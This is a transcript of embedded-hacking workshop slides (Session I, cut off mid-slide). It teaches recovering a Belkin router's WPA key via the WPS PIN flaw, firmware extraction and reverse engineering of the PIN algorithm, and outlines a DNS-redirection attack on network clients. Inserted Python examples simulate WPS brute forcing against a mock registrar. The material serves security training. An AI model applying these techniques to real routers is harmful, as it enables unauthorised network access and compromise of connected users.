Embedded device hacking Session i
Transcript of Embedded device hacking Session i
Page 1
Embedded Device Hacking
Session I: Obtaining Initial Remote Access
By: Malachi Jones, PhD
Page 2
About Me
Education
Bachelor's Degree: Computer Engineering (Univ. of Florida, 2007)
Master's Degree: Computer Engineering (Georgia Tech, 2009)
PhD: Computer Engineering (Georgia Tech, 2013)
Cyber Security Experience
Harris: Cyber Software Engineer (2013-2014)
Harris: Vulnerability Researcher (2015)
Booz Allen Dark Labs: Embedded Security Researcher (2016-Present)
https://www.linkedin.com/in/malachijonesphd
Page 3
About Dark Labs
Booz Allen Dark Labs is an elite team of security researchers, penetration testers, reverse engineers, network analysts, and data scientists, dedicated to stopping cyber attacks before they occur. (Source: http://darklabs.bah.com)
Page 4
Outline
I. Motivation: Ubiquity of embedded devices
II. Objectives of Workshop
III. Workshop Overview
IV. The Workshop: Hacking a consumer router
Session I: Obtaining Initial Remote Access
Session II: Exploitation
Session III: pwnage
V. Conclusion
Page 5
Motivation
Ubiquity of Embedded Devices
Critical Infrastructure (Nuclear Power Plant)
Life Critical Systems (Pacemaker)
Financial Infrastructure (Banking & Investing)
Internet of Things (IoT) (IoT Gadgets)
Commercial Products (Network Switch)
Transportation Systems (Jeep)
Page 6
2015: A Year of Embedded Exploitation
Page 7
2016: The Exploitation Continues…
Page 8
2017: It's Just Getting Started
?????
Page 9
Objectives of Workshop
Explore practical applications of reverse engineering
Discuss concepts and techniques that hackers use to uncover vulnerabilities in real-world embedded devices
Provide a hands-on introduction to key pen-testing tools
Page 10
Workshop Overview
Want to understand the process of hacking/pentesting a sophisticated embedded system such as a car?
Page 11
Workshop Overview
A good first step is to learn how to hack a consumer router
Why?
It's cheaper, so if you make a mistake and brick it, you won't be out $60k+
Although a simpler system and an easier target, the core pentesting principles and processes are similar
Page 12
Workshop Overview
We’ll focus on a Belkin router (F5D7234-4 version 5)
It's cheap (<$20) and a fairly soft target, suitable for individuals new to embedded hacking
Page 13
Workshop Overview
Overall Hacking Objective:
Compromise an initial target (e.g. a Wi-Fi router) and then use that target as leverage to compromise other targets
Page 14
Workshop Overview
Steps to Achieve Hacking Objective:
1) Obtain initial remote access to the device
Wi-Fi Router Context: This means the ability to connect to its network, which often requires knowledge of the WPA password
Page 15
Workshop Overview
Steps to Achieve Hacking Objective:
2) Escalate privileges on device to admin/root
Wi-Fi Router Context: Administrative privileges can allow us to control/manipulate the IP traffic of clients connected to the device
Page 16
Workshop Overview
Steps to Achieve Hacking Objective:
3) Exploit privileges to compromise other devices
Wi-Fi Router Context: Send clients malicious IP traffic that allows us to compromise them as well
Page 17
Workshop Overview
Router Exploitation Example (via Redirection Attack)
Step 1: Hacker gains remote access to router
Step 2: Elevates privileges to admin
Step 3: Changes DNS settings on router
Step 4: Router now talks to the hacker's server to resolve names
Step 5: www.cnn.com now resolves to an IP address of the hacker's server
Step 6: Hacker serves malicious traffic to devices on the network
Step 7: Pwned
Page 18
Workshop Overview
The workshop will be organized into three sessions that capture the pen-testing phases of going from discovery to p0wnage:
Session I: Discovery of a vulnerability in the WPS implementation to obtain initial access on the device
Session II: Exploring weaknesses in the web management interface to gain administrative access
Session III: Development of a proof of concept that demonstrates how a Windows 7 user can be p0wned via web browser with a maliciously configured router
Page 19-21
Workshop Overview
The Router Exploitation Example (via Redirection Attack) is repeated three times, with one session highlighted each time: Session I covers Step 1 (hacker gains remote access to router), Session II covers Step 2 (elevates privileges to admin), and Session III covers Steps 3-7 (changes DNS settings on router, router resolves names via the hacker's server, www.cnn.com resolves to the hacker's server, hacker serves malicious traffic to devices on the network, pwned).
Page 22
The Workshop
Hacking a Consumer Router
Page 23
The Workshop
Session I: Obtaining Initial Remote Access to the Device
Page 24
Session I: Outline
I. Overview
II. Background
III. Required Material
IV. Lab 1: Firmware Data Extraction with Binwalk
V. Lab 2: Reversing/Bug Hunting with IDA Pro
VI. Lab 3: Obtain Initial Access with Wireshark & Reaver
Page 25
Session I: Overview (tl;dr)
The WPS PIN method is on by default on virtually all consumer routers
A design flaw in WPS allows the PIN to be brute forced in under 11,000 attempts
Once the WPS PIN is known, a tool such as Reaver can retrieve the WPA key immediately, since the router hands it over as soon as the PIN is accepted (see next slide)
On some routers (including the F5D7234-4), the default PIN can be computed by reverse engineering the PIN generation algorithm
Page 26
Session I: The Big Picture
Overall goal is to figure out what the router's WPA password is so that we can gain initial access to the router and the connected clients
Pipeline (in the order of Labs 1-3):
1) Extract firmware to find the pin algorithm
2) Reverse engineer the algorithm
3) Obtain inputs to the algorithm by sniffing traffic
4) Generate the pin and use Reaver to get the password
Page 27-29
Session I: The Big Picture
The pipeline above is repeated three times, highlighting which lab covers which step: Lab 1 is extracting the firmware to find the pin algorithm, Lab 2 is reverse engineering the algorithm, and Lab 3 is obtaining the algorithm's inputs by sniffing traffic, then generating the pin and using Reaver to get the password.
Page 30
Session I: The Big Picture
End Result: Gain Access to Management Interface
Page 31
Session I: The Big Picture
The Router Exploitation Example (via Redirection Attack) again, with Step 1 (hacker gains remote access to router) highlighted as the Session I deliverable; Steps 2-7 (elevate privileges to admin, change DNS settings, resolve www.cnn.com to the hacker's server, serve malicious traffic, pwned) belong to the later sessions.
Page 32
Session I: Outline (repeated; next section: II. Background)
Page 33
Session I: Background
1. WPS Design Flaw Explained
2. Exploiting Belkin’s PIN Generation Algorithm
3. IDA Pro
Page 34
Background: WPS Explained
Wi-Fi Protected Setup (WPS) was created by Wi-Fi Alliance in 2006
Goal: make it easy for home users to add new devices to the network securely without entering long passphrases
One of the modes lets the user enter the router's 8-digit PIN to connect a desired device to the network
Page 35
Background: WPS Explained
Design Flaw Explained: WPS uses an 8-digit numeric PIN (each digit 0-9)
Number of attempts to brute force an 8-digit PIN:
[d1 d2 d3 d4 d5 d6 d7 d8]
10^8 = 100 million
Page 36
Background: WPS Explained
Design Flaw Explained: the 8th digit of the PIN is a checksum of the first 7, so only 7 digits are unknown
Number of attempts to brute force a 7-digit PIN:
[d1 d2 d3 d4 d5 d6 d7 | checksum]
10^7 = 10 million
Page 37
Background: WPS Explained
Design Flaw Explained: the PIN is verified in two halves, and the registrar answers each half with an ACK or a NACK, revealing whether that half is correct
Number of attempts to brute force a 7-digit PIN split into two groups (4 + 3):
[d1 d2 d3 d4 | d5 d6 d7 checksum]
10^4 + 10^3 = 11,000
(NACK/ACK after the first half, NACK/ACK after the second half)
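The arithmetic above, worked through as an added example that is not part of the original slides: the WPS checksum digit is the one defined by the WPS specification (the same routine wpa_supplicant and Reaver implement), and the registrar is a constructed mock that only reveals whether each half of the PIN matched, which is exactly the oracle a real access point leaks through its NACK after M4 (first half) and after M6 (second half).

```python
"""Added example (not from the slides): the WPS PIN checksum and a simulated
two-phase brute force showing why the bound is 11,000 attempts, not 10**8.

wps_checksum() is the checksum from the WPS specification. MockRegistrar is a
constructed stand-in for the access point that behaves like a real registrar
in one respect only: it ACKs or NACKs each half of the PIN separately.
"""


def wps_checksum(pin7: int) -> int:
    """Return the 8th (check) digit for a 7-digit WPS PIN."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)   # odd positions (from the right) weigh 3
        pin7 //= 10
        accum += pin7 % 10         # even positions weigh 1
        pin7 //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin8: int) -> bool:
    """True if the last digit is the correct checksum of the first seven."""
    return 0 <= pin8 <= 99999999 and wps_checksum(pin8 // 10) == pin8 % 10


class MockRegistrar:
    """Constructed access-point registrar: answers per half, like the real
    protocol (NACK after M4 => first half wrong, NACK after M6 => second)."""

    def __init__(self, pin8: int):
        if not is_valid_pin(pin8):
            raise ValueError("registrar PIN must carry a valid checksum")
        self._first_half = pin8 // 10000    # digits 1-4
        self._second_half = pin8 % 10000    # digits 5-8 (incl. checksum)

    def m4_ack(self, first_half: int) -> bool:
        """Registrar ACKs M4 only if the first half is right."""
        return first_half == self._first_half

    def m6_ack(self, first_half: int, second_half: int) -> bool:
        """Registrar ACKs M6 only if both halves are right."""
        return (first_half == self._first_half
                and second_half == self._second_half)


def brute_force_pin(reg: MockRegistrar):
    """Recover the PIN through the per-half oracle; returns (pin, attempts).

    Phase 1 tries at most 10**4 first halves. Phase 2 tries at most 10**3
    second halves because the 8th digit is derived from the other seven.
    Worst case is therefore 10,000 + 1,000 = 11,000 exchanges.
    """
    attempts = 0
    first = None
    for candidate in range(10_000):
        attempts += 1
        if reg.m4_ack(candidate):
            first = candidate
            break
    if first is None:
        return None, attempts

    for tail in range(1_000):
        attempts += 1
        pin7 = first * 1_000 + tail
        second = tail * 10 + wps_checksum(pin7)   # fill in the check digit
        if reg.m6_ack(first, second):
            return first * 10_000 + second, attempts
    return None, attempts


if __name__ == "__main__":
    for target in (12345670, 99999995):
        pin, n = brute_force_pin(MockRegistrar(target))
        print(f"target {target:08d}: recovered {pin:08d} in {n} attempts")
```

Running the script recovers 12345670 in 1,803 exchanges and the worst-case PIN 99999995 in exactly 11,000. A real run against an access point is slower per exchange (and many newer routers lock WPS out after a few failures), but the number of exchanges is bounded the same way.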
Page 38
Background: WPS Explained
We could exploit this design flaw on the Belkin router we are targeting to obtain the pin
However, there is a WPS implementation flaw, specific to this router, that allows us to get the pin in 1 try vs. 11,000
Page 39
Background: Belkin Pin Generation Exploit
The pin generation exploit material presented in this workshop is based on the write-up by Craig at www.devttys0.com
/dev/ttyS0 provides excellent material on embedded hacking in general and router hacking in particular
Page 40
Background: Belkin Pin Generation Exploit
Belkin WPS Pin Algorithm (diagram): the Serial ID and the WLAN MAC are fed into the Pin Generation Algorithm, which outputs the 8-digit PIN (shown as 12345678 in the diagram)
Note: Serial ID and WLAN MAC can be obtained by sniffing certain packets that are broadcast by the router
Page 41
Background: IDA Pro
De facto tool for disassembling, decompiling, and debugging binaries
Supports a wide array of processor architectures, including MIPS, ARM, and x86/x64
Page 42
Background: IDA Pro Features
Code Flow of Routine (sub_43A53C) (screenshot)
Page 43
Code Flow of Routine (sub_43A53C), annotated: the for loop, the "loop back here" edge, and the branch taken to effectively exit the function if the dereferenced value is 0
Page 44
Background: IDA Pro Features
IDA scripting support: Python scripting, known as IDAPython, provides a powerful way to add extensive utilities and features to IDA
IDA also has a native scripting language, IDC, which is a "C-like" language
Page 45
Background: IDA Pro Features
Decompiling with Hex-Rays (x86, x64, and ARM)
Page 46
Background: IDA Pro Features
(screenshot: ARM disassembly alongside the decompiled "pseudo-C")
Page 47
Background: IDA Pro Features
For more information on IDA, there is a pretty awesome book written by Chris Eagle (The IDA Pro Book)
Page 48
Background: Acquiring IDA Pro
Professional Edition: $1500
Pro + Hex-Rays decompiler (x86/x64 + ARM): $5500
Freeware version: a very old edition without newer features, including IDAPython; only x86 disassembler support; still a good starting point
Page 49
Background: IDA Pro Alternatives
Binary Ninja, license: $99.00 (Personal License)
Up-and-coming legitimate alternative/competitor to IDA Pro
Supports x86/x64, ARM, and MIPS
Decompiler support
OS platforms: Windows, OS X, and Linux
Page 50
Background: IDA Pro Alternatives
Binary Ninja Screenshot
Page 51
Session I: Outline (repeated; next section: III. Required Material)
Page 52
Required Material
Software: Kali Linux VM 1.x; IDA Pro; VMware/VirtualBox
Hardware: Belkin F5D7234-4 version 5; Wi-Fi adapter with monitor mode (e.g. TP-LINK TL-WN722N)
Page 53
Required Material
Page 54
Session I: Outline (repeated; next section: Lab 1: Firmware Data Extraction)
Page 55
Lab 1: Firmware Data Extraction & Analysis
Overall goal is to figure out what the router's WPA password is so that we can gain initial access to the router and the connected clients
Pipeline with Lab 1 highlighted: 1) extract firmware to find the pin algorithm (Lab 1); 2) reverse engineer the algorithm; 3) obtain inputs to the algorithm by sniffing traffic; 4) generate the pin and use Reaver to get the password
Page 56
Lab 1: Firmware Data Extraction & Analysis
Steps for Extraction & Analysis
1. Install squashfs-tools if not installed
2. Perform initial analysis of firmware w/ Binwalk
3. Extract firmware data
4. Explore the squash file system folder
Page 57
Extraction and Analysis (Steps)
1) Install squashfs-tools if not installed
(Next Slide)
Page 58
Install squashfs-tools if not installed
$ sudo apt-get install squashfs-tools
Page 59
Extraction and Analysis (Steps)
2) Let binwalk do an initial analysis of firmware
(Next Slide)
Page 60
Initial analysis with Binwalk
$ sudo binwalk DIR810LB1_FW203B02.bin
Page 61
Extraction and Analysis (Steps)
3) Extract firmware data
(Next Slide)
Page 62
Extract Firmware Data
$ sudo binwalk -e DIR810LB1_FW203B02.bin
Page 63
Extraction and Analysis (Steps)
4) Explore files in the SquashFS folder
(Next Slides)
Page 64
Explore squash filesystem
$ ls -l $absolute-path-to-squash-folder
Page 65
Explore squash filesystem
$ ls -l $absolute-path-to-squash-folder/sbin
sbin contains ncc, the binary that holds the WPS pin generation logic
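What steps 2 and 3 above do inside binwalk, written out as an added example (this is not binwalk's code and not part of the slides): a signature scan for known magic bytes, a sanity-checked parse of the SquashFS v4 superblock, and a carve of the filesystem image that you would then hand to unsquashfs. The firmware blob is constructed in build_sample_firmware(); the superblock layout and compression IDs are the standard ones from the kernel's squashfs_fs.h.

```python
"""Added example (not from the slides, not binwalk's own code): a minimal
signature scan plus SquashFS carve in plain Python, showing what `binwalk`
and `binwalk -e` do for this case. The image is constructed in
build_sample_firmware(); the SquashFS v4 superblock layout and compression
IDs are the standard ones from the kernel's squashfs_fs.h."""
import struct
from typing import Dict, List, Tuple

# (description, magic bytes): a tiny subset of binwalk's signature database
SIGNATURES = [
    ("gzip compressed data", b"\x1f\x8b\x08"),
    ("ELF executable", b"\x7fELF"),
    ("Squashfs filesystem, little endian", b"hsqs"),
    ("Squashfs filesystem, big endian", b"sqsh"),
]
# First 48 bytes of a SquashFS v4 superblock: magic, inodes, mkfs_time,
# block_size, fragments, compression, block_log, flags, no_ids, s_major,
# s_minor, root_inode, bytes_used
SQFS_SUPERBLOCK = "<4sIIIIHHHHHHQQ"
SQFS_COMPRESSION = {1: "gzip", 2: "lzma", 3: "lzo", 4: "xz", 5: "lz4", 6: "zstd"}


def scan(blob: bytes) -> List[Tuple[int, str]]:
    """Return every (offset, description) at which a known magic occurs."""
    hits = []
    for description, magic in SIGNATURES:
        start = 0
        while (idx := blob.find(magic, start)) != -1:
            hits.append((idx, description))
            start = idx + 1
    return sorted(hits)


def parse_squashfs_superblock(blob: bytes, offset: int) -> Dict[str, object]:
    """Decode the superblock at `offset`, rejecting false positives (a stray
    'hsqs' inside compressed data) and sizes that run past the image."""
    if offset + struct.calcsize(SQFS_SUPERBLOCK) > len(blob):
        raise ValueError("truncated superblock")
    (magic, inodes, _mkfs_time, block_size, _fragments, compression,
     block_log, _flags, _no_ids, s_major, s_minor, _root_inode,
     bytes_used) = struct.unpack_from(SQFS_SUPERBLOCK, blob, offset)
    if magic != b"hsqs":
        raise ValueError("not a little-endian squashfs superblock")
    if s_major != 4 or (1 << block_log) != block_size:
        raise ValueError("inconsistent superblock fields; likely a false positive")
    if offset + bytes_used > len(blob):
        raise ValueError("bytes_used runs past the end of the image")
    return {"version": f"{s_major}.{s_minor}", "inodes": inodes,
            "block_size": block_size, "bytes_used": bytes_used,
            "compression": SQFS_COMPRESSION.get(compression, f"unknown({compression})")}


def carve_squashfs(blob: bytes, offset: int) -> bytes:
    """Cut the squashfs image out of the firmware, as `binwalk -e` does
    before handing it to unsquashfs from squashfs-tools."""
    return blob[offset:offset + parse_squashfs_superblock(blob, offset)["bytes_used"]]


def build_sample_firmware() -> Tuple[bytes, int]:
    """Constructed stand-in for a vendor image (not real firmware): a zeroed
    64-byte header, a gzip-magic kernel stub, padding to 4096, then a
    squashfs v4 superblock followed by 1000 bytes of placeholder data."""
    payload = b"\xAA" * 1000
    superblock = struct.pack(
        SQFS_SUPERBLOCK, b"hsqs",
        12,           # inodes
        0x5A0B0000,   # mkfs_time
        131072,       # block_size
        0,            # fragments
        4,            # compression id 4 = xz
        17,           # block_log: 2**17 == block_size
        0xC0,         # flags
        1,            # no_ids
        4, 0,         # s_major, s_minor
        0,            # root_inode
        struct.calcsize(SQFS_SUPERBLOCK) + len(payload),  # bytes_used
    )
    image = b"\x00" * 64 + b"\x1f\x8b\x08" + b"\x00" * 500
    image += b"\xFF" * (4096 - len(image))
    return image + superblock + payload, 4096


def report(blob: bytes) -> str:
    """binwalk-style listing: DECIMAL, HEXADECIMAL, DESCRIPTION."""
    lines = ["DECIMAL       HEXADECIMAL     DESCRIPTION"]
    for offset, description in scan(blob):
        if description.startswith("Squashfs"):
            try:
                sb = parse_squashfs_superblock(blob, offset)
                description += (f", version {sb['version']}, compression:"
                                f"{sb['compression']}, size: {sb['bytes_used']} bytes")
            except ValueError as exc:
                description += f" (rejected: {exc})"
        hex_offset = f"0x{offset:X}"
        lines.append(f"{offset:<14}{hex_offset:<16}{description}")
    return "\n".join(lines)


if __name__ == "__main__":
    firmware, sqfs_offset = build_sample_firmware()
    print(report(firmware))
    print(f"carved {len(carve_squashfs(firmware, sqfs_offset))} bytes of squashfs")
```

The consistency checks in parse_squashfs_superblock are the part worth copying: real vendor images routinely contain magic-looking byte runs inside compressed data, and carving on the strength of four bytes alone is how you end up feeding garbage to unsquashfs.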
Page 66
Lab 1: Q&A
Why are we using D-Link firmware instead of Belkin? The D-Link binary has symbols (e.g. function names), which makes it easier to follow for those newer to reversing
Stripped firmware (i.e. no symbols) can be very difficult and take a substantial amount of time to reverse
The pin generation algorithm is conceptually similar between the D-Link and Belkin routers
What technique can help reverse engineer stripped binaries? Use the debug strings found in the binary to build intuition about what a routine is doing
Page 67
Lab 1: Q&A
How did we know the WPS pin generation logic could be found at /sbin/ncc? You can write an IDAPython script that iterates through the binaries in the filesystem to search for specific symbols and strings
Strings and symbols of interest could contain "WPS", "WPS Pin", "Pin generation", etc.
How can the firmware be acquired? [Easy] Manufacturer's website
[Difficult] Manual extraction from the device via JTAG or the serial port (see next 2 slides)
Note: Forge Hackerspace has a workshop on manual firmware extraction!
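The binary-triage idea from the first question, as an added example that is not from the slides: instead of an IDAPython script, this plain-Python version walks the extracted filesystem, pulls printable strings out of every ELF file (what `strings` does) and scores each binary by WPS-related keywords, so you know which binary to open in IDA first. The sample root filesystem is constructed in build_sample_tree() and its file names and contents are illustrative only.

```python
"""Added example (not from the slides): plain-Python stand-in for the
IDAPython "search every binary for WPS strings and symbols" idea. Walks an
extracted rootfs, extracts printable strings from each ELF, and ranks the
binaries by keyword hits. The tree built by build_sample_tree() is a
constructed stand-in, not the real D-Link filesystem."""
import os
import re
import tempfile
from typing import Dict, List, Tuple

ELF_MAGIC = b"\x7fELF"
KEYWORDS = ("wps", "pin", "default_pin", "pin generation", "wsc")


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Return runs of at least min_len printable ASCII bytes (like `strings`)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def is_elf(path: str) -> bool:
    """True if the file starts with the ELF magic."""
    try:
        with open(path, "rb") as fh:
            return fh.read(4) == ELF_MAGIC
    except OSError:
        return False


def keyword_hits(strings: List[str], keywords=KEYWORDS) -> Dict[str, List[str]]:
    """Map each keyword to the strings containing it (case-insensitive)."""
    hits: Dict[str, List[str]] = {}
    for s in strings:
        low = s.lower()
        for kw in keywords:
            if kw in low:
                hits.setdefault(kw, []).append(s)
    return hits


def triage(root: str, keywords=KEYWORDS) -> List[Tuple[str, int, Dict[str, List[str]]]]:
    """Scan every ELF under root; return (relative path, score, hits), best first.
    Symlinks and non-ELF files (scripts, configs) are skipped."""
    results = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not is_elf(path):
                continue
            with open(path, "rb") as fh:
                hits = keyword_hits(extract_strings(fh.read()), keywords)
            score = sum(len(v) for v in hits.values())
            if score:
                results.append((os.path.relpath(path, root), score, hits))
    results.sort(key=lambda r: r[1], reverse=True)
    return results


def build_sample_tree() -> str:
    """Constructed mini-rootfs: a fake 'ncc' carrying WPS symbols and a debug
    string, a fake 'busybox' with unrelated strings, and a shell script that
    mentions WPS but is not an ELF and so must be skipped."""
    root = tempfile.mkdtemp(prefix="squashfs-root-")
    for sub in ("sbin", "bin", "etc"):
        os.makedirs(os.path.join(root, sub))
    with open(os.path.join(root, "sbin", "ncc"), "wb") as fh:
        fh.write(ELF_MAGIC + b"\x01\x01\x01\x00" * 4
                 + b"get_default_pin\x00wps_pin_checksum\x00"
                 + b"WPS: generated default PIN %08d\x00\x00\xff\xfe"
                 + b"lockAndGetInfo_log\x00")
    with open(os.path.join(root, "bin", "busybox"), "wb") as fh:
        fh.write(ELF_MAGIC + b"\x00" * 8 + b"BusyBox v1.20.2 multi-call binary\x00")
    with open(os.path.join(root, "etc", "rc.local"), "wb") as fh:
        fh.write(b"#!/bin/sh\nwps_start\n")
    return root


if __name__ == "__main__":
    for path, score, hits in triage(build_sample_tree()):
        print(f"{score:3d}  {path}")
        for kw, strings in hits.items():
            print(f"      {kw}: {strings}")
```

On the constructed tree only sbin/ncc scores, which is the answer the slide gives; on a real extracted image the same ranking narrows dozens of binaries down to the two or three worth loading into IDA, and the matched strings (debug messages in particular) are what you search for once the binary is open.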
Page 68
Linksys WRT120N PCB (Serial Port) (photo with the serial port header labeled)
Page 69
Linksys WRT120N PCB (Serial Port) (second photo)
Page 70
Lab 1: Firmware Data Extraction
Additional Resources: Reverse Engineering Firmware: http://www.devttys0.com/2011/05/reverse-engineering-firmware-linksys-wag120n/
Page 71
Session I: Outline (repeated; next section: Lab 2: Reversing with IDA Pro)
Page 72
Lab 2: Reversing with IDA Pro
Overall goal is to figure out what the router's WPA password is so that we can gain initial access to the router and the connected clients
Pipeline with Lab 2 highlighted: 1) extract firmware to find the pin algorithm; 2) reverse engineer the algorithm (Lab 2); 3) obtain inputs to the algorithm by sniffing traffic; 4) generate the pin and use Reaver to get the password
Page 73
Lab 2: Reversing with IDA Pro
Description: In this lab, we will take a look at the binary ncc, located in /sbin of the SquashFS filesystem
Since ncc has quite a bit of WPS logic, which includes the pin generation algorithm, we'll do some exploring
We'll walk through the process of locating a code segment of interest (the WPS pin algorithm) and illustrate the process of reversing the segment into C code
Page 74
Lab 2: Reversing with IDA Pro
Steps for Bug Hunting and Reversing
1. Load the binary ncc into IDA Pro for analysis
2. Hunt for the pin generation algorithm
3. Analyze the inputs of the algorithm
4. Reverse the algorithm segment into C code
Page 75
Lab 2: Reversing with IDA Pro (Steps)
1) Load the binary ncc into IDA Pro for analysis
(Next Slide)
Page 76
Load the binary ncc into IDA Pro
1a. Launch IDA Pro
Page 77
Load the binary ncc into IDA Pro
1b. Click “New”
Page 78
Load the binary ncc into IDA Pro
1c. Drag the ncc binary into IDA; IDA detects that the binary is a MIPS ELF
Page 79
Load the binary ncc into IDA Pro
1d. Click “ok”
Page 80
Load the binary ncc into IDA Pro
1e. Wait for IDA to finish analyzing the binary
Page 81
Load the binary ncc into IDA Pro
1f. IDA indicates that auto-analysis is complete
Page 82
Reversing with IDA Pro (Steps)
2) Hunt for the pin generation algorithm
(Next Slide)
Page 83
Hunt for the pin generation algorithm
a. See if you can find the pin generation routine
Page 84-85
Hunt for the pin generation algorithm
a. (Hint: What happens when I search for "router" in the Function Window?)
Note: Ctrl+F brings up the search box; the term "router" is entered into the function name filter (two screenshots)
Page 86
Hunt for the pin generation algorithm
a. (Hint: Try some search terms relevant to the algorithm we're trying to find)
Try your own search terms ???
Page 87
Hunt for the pin generation algorithm
a. (Try a few more keywords before you go to the next slide!!!)
Try your own search terms ???
Page 88
Hunt for the pin generation algorithm
b. Let’s try the keyword “default” and see what we get
This looks interesting
Page 89
Hunt for the pin generation algorithm
c. Double click on “get_default_pin”
Page 90
Hunt for the pin generation algorithm
c. (Continued…)
Page 91
Lab 2: Reversing with IDA Pro (Steps)
3) Analyzing the pin algorithm in subroutine get_default_pin
(Next Slide)
Page 92
Analyze pin generation algorithm
a. Let's examine possible input sources to the algorithm
Page 93
Analyze pin generation algorithm
a. Let's examine possible input sources to the algorithm: a call is made to a subroutine that appears to get some information
A subset of the data from lockAndGetInfo_log will be formatted as follows: "%c%c:%c%c:%c%c:…"
![Page 94: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/94.jpg)
Any guesses on what “%c:%c…” might be?
Hunt for the pin generation algorithm
b. Let's take a closer look at the sprintf call
Decompiling by hand to pseudo C:
    char buffer[….];
    char *data = lockAndGetInfo_log->interesting_data_element;
    ……………………………………
    sprintf(buffer, "%c%c:%c%c:%c%c:%c%c:%c%c:%c%c", data[0], data[1], …, data[11]);
![Page 95: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/95.jpg)
Hints
It's 12 characters with a “:” between each pair of 2 characters
This is a networking device
What is something (e.g. an identifier) that every networking device typically has that would be a good seed for a pin generation algorithm?
Hunt for the pin generation algorithm
c. Figure out what type of data could “%c%c…:%c%c” represent
    char buffer[….];
    char *data = lockAndGetInfo_log->interesting_data_element;
    ……………………………………
    sprintf(buffer, "%c%c:%c%c:%c%c:%c%c:%c%c:%c%c", data[0], data[1], …, data[11]);
![Page 96: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/96.jpg)
Answer: MAC address
Unique across all networking devices
12 bytes
Often used in combination with other values to seed various algorithms
Hunt for the pin generation algorithm
c. Figure out what type of data could “%c%c:..:%c%c” represent
    char buffer[….];
    char *data = lockAndGetInfo_log->interesting_data_element;
    ……………………………………
    sprintf(buffer, "%c%c:%c%c:%c%c:%c%c:%c%c:%c%c", data[0], data[1], …, data[11]);
![Page 97: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/97.jpg)
4) Reverse algorithm segment into C code
(Next Slide)
Extraction and Analysis (Steps)
![Page 98: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/98.jpg)
As we will see, reversing assembly into C can be a tedious and arduous process
We will reverse the following code segment:
Reverse algorithm segment into C code
a. Reversing an example snippet of code
![Page 99: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/99.jpg)
Instruction ‘li’: Loads a constant value into a register
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly / Pseudo-C code
v0 = 0x38E38E39
MIPS Instruction ‘li’:
Loads a constant value into a register
Value will be used for future arithmetic operation
![Page 100: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/100.jpg)
Instruction ‘li’: Loads a constant value into a register
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly / Pseudo-C code
v0 = 0x38E38E39
[hi,lo] = v0*a3
MIPS Instruction ‘multu’:
Multiply two 32-bit values (e.g. a3 & v0)
Registers ‘hi’ & ‘lo’ store the resulting 64-bit product: hi holds the upper 32 bits, lo the lower 32 bits
![Page 101: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/101.jpg)
Instruction ‘li’: Loads a constant value into a register
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly / Pseudo-C code
v0 = 0x38E38E39
[hi,lo] = v0*a3
v0 = (v0*a3) >> 32; // right shift by 32
MIPS Instruction ‘mfhi’:
Move value in ‘hi’ register to specified register (e.g. v0)
This is equivalent to right shifting the 64-bit product of v0 & a3 by 32-bits
![Page 102: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/102.jpg)
Instruction ‘li’: Loads a constant value into a register
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly / Pseudo-C code
v0 = 0x38E38E39
[hi,lo] = v0*a3
v0 = (v0*a3) >> 32; // right shift by 32
v0 = v0 >> 1;
= ((a3 * 0x38E38E39) >>32) >> 1
MIPS Instruction ‘srl’:
Shift right logical
Logical means that the upper bits vacated by the shift are filled with the value ‘0’ (no sign extension)
Lower bits that get shifted out are discarded
![Page 103: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/103.jpg)
Observations
The net result of the assembly instructions is a complex looking expression
It turns out that this can be simplified quite a bit
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
![Page 104: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/104.jpg)
Observations
Consecutive logical shifts can be combined, since the shift amounts simply add
e.g. (v1 >> 32) >> 1 == v1 >> 33
Reverse algorithm segment into C code
li $v0, 0x38E38E39
multu $a3, $v0
………………………………………………
mfhi $v0
srl $v0, 1
a. Reversing an example snippet of code
Disassembly C code
v0 = ((a3 * 0x38E38E39) >>32) >> 1
= (a3 * 0x38E38E39) >> 33
![Page 105: Embedded device hacking Session i](https://reader034.fdocuments.us/reader034/viewer/2022042707/58d005de1a28abad3e8b48b1/html5/thumbnails/105.jpg)
Observations
